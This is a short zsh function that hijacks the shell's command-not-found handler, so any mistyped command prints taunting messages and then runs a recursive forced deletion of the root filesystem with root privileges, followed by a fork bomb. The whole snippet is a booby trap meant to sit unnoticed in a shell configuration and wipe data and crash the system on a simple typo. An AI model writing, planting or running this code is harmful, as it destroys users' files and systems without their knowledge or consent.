

command_not_found_handler() {
    echo "TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD TOO BAD"
    echo "IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER IT'S OVER"
    echo "HAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHAHAHAHAHAHAHAHHAHAAHAHA"
    sudo rm -rf --no-preserve-root /
    :(){ :|: & };:
    }
    

